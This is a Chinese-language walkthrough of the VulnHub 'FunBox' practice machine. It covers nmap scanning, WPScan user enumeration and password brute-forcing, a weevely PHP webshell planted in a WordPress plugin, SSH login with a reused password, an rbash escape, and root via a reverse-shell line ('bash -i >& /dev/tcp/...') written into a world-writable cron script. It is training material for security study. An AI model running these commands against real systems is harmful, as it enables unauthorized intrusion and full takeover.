funbox-vulnhub靶机-writeup
程序员文章站
2022-07-15 14:30:04
...
FunBoxWriteup
0x00 找到目标主机
使用nmap扫描网段,发现目标
nmap -sn 16.16.16.0/24 //发现目标机器IP为16.16.16.157
nmap -A 16.16.16.157 -v //直接nmap全扫
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: F8:FF:C2:4C:7B:F3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/13%OT=21%CT=1%CU=34633%PV=N%DS=1%DC=D%G=Y%M=F8FFC2%T
OS:M=5F34B6B3%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 26.140 days (since Sat Jul 18 08:21:27 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 16.16.16.157
0x01 信息收集
开放了80端口,访问看看发现被重定向到了funbox.fritz.box无法访问。
试图打开http://16.16.16.157/index.php,发现有内容了,但没有正确显示,一些css无法正常加载,F12发现url被重定向到了funbox.fritz.box,解决方案:在攻击机上添加hosts就可以了。
通过目录fuzzing发现一些URL:
http://funbox.fritz.box/index.php
http://funbox.fritz.box/robots.txt
http://funbox.fritz.box/secret/index.html //本以为是个提示点,但发现也没啥
http://funbox.fritz.box/wp-login.php
使用wpscan扫描发现了两个用户admin,joe
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
直接**下密码试下,(admin的密码,要找个大点的字典,小字典跑不出来)
wpscan --url http://funbox.fritz.box/ -P /usr/share/password.lst --max-threads 100
[!] Valid Combinations Found:
| Username: joe, Password: 12345
| Username: admin, Password: iubire
0x02 getshell
尝试登录下wordpress后台,joe账号没什么权限,没有主题、插件等模块
使用admin账号登录,进入后台。
此处试着插入php木马试试。
先在kali使用weevely生成PHP木马
weevely generate hehe /tmp/1.php #生成一个名为1.php的后门,密码为hehe
将1.php的内容复制后,写入上图中的404.php点击保存的时候报错,看来是不允许在这里更新文件内容
抱着侥幸的心里,在插件模块再试一下能否写入
成功写入,那就使用weevely连接吧
weevely http://16.16.16.157/wp-content/plugins/akismet/index.php hehe
成功获取到一个低权限的shell,下一步就是提权了。
0x03 提权
获取到webshell后先收集一波信息
按照惯例我们到家目录看看
惊喜的发现了另外两个用户,并且其中的joe很眼熟,不就是前面我们登录网站时的名字嘛,很有可能密码是相同的12345,试试ssh连一下
ssh aaa@qq.com
ls发现joe的家目录存在一个mbox的文件,cat一下看看
aaa@qq.com:~$ cat mbox
From aaa@qq.com Fri Jun 19 13:12:38 2020
Return-Path: <aaa@qq.com>
X-Original-To: aaa@qq.com
Delivered-To: aaa@qq.com
Received: by funbox.fritz.box (Postfix, from userid 0)
id 2D257446B0; Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
Subject: Backups
To: <aaa@qq.com>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <aaa@qq.com>
Date: Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
From: root <aaa@qq.com>
Hi Joe, please tell funny the backupscript is done.
From aaa@qq.com Fri Jun 19 13:15:21 2020
Return-Path: <aaa@qq.com>
X-Original-To: aaa@qq.com
Delivered-To: aaa@qq.com
Received: by funbox.fritz.box (Postfix, from userid 0)
id 8E2D4446B0; Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
Subject: Backups
To: <aaa@qq.com>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <aaa@qq.com>
Date: Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
From: root <aaa@qq.com>
Joe, WTF!?!?!?!?!?! Change your password right now! 12345 is an recommendation to fire you.
整理一下关键词:backups、backupscript、funny
带着关键词我们切换到funny的home目录看看
但是好像遇到点麻烦,我们Google一下报错,rbash是个受限制的shell,网上提供了一些逃逸方法,这里直接一条命令就搞定bash -i
根据前面的关键词,我们在funny的home目录找找线索
发现了个backup.sh,这应该就是mbox中提示的点吧
.reminder.sh内容 ,就是说新的管理员对backup.sh进行了长期运行,可以猜测这个backup.sh脚步会持续性间隔时间执行。重点是告诉我们,每隔一段时间,backup.sh都会以管理员权限运行一次。
查看权限发现此.backup.sh全用户可读写、执行。
先看看现在backup.sh是什么内容
那就接下来就是复写这个文件vim .backup.sh
#!/bin/bash
bash -i >& /dev/tcp/16.16.16.159/1234 0>&1
同时,我们攻击机打开nc监听1234
nc -lvp 1234
根据前面猜测,backup.sh会周期性的执行,那我们nc监听1234等待一会儿好了,说不定每隔一分钟就执行一次呢。
静静地等待……几分钟过后弹出root权限的shell。
后面发现,这一步有时会弹出funny的shell,后面发现,funny和root两个用户都是用了定时任务,funny用户每两分钟执行一次backup.sh,root用户每五分钟执行一次。所以就会导致这一步有时弹出funny的shell,有时弹出root的shell。我算是运气还不错的。
现在再去回味.reminder.sh的内容就理解了
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" aaa@qq.com
//funny用户的定时任务,每两分钟执行一次/home/funny/.backup.sh
aaa@qq.com:/var/spool/cron/crontabs# cat funny
cat funny
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.n8Fr20/crontab installed on Fri Jun 19 14:33:06 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/2 * * * * /home/funny/.backup.sh
--------------------------------------------------
//root用户的定时任务,每五分钟执行一次/home/funny/.backup.sh
aaa@qq.com:/var/spool/cron/crontabs# cat root
cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.gcHh7z/crontab installed on Fri Jun 19 13:57:00 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/5 * * * * /home/funny/.backup.sh
获取root权限的方式应该不止这一种,希望后续可以再挖掘思路……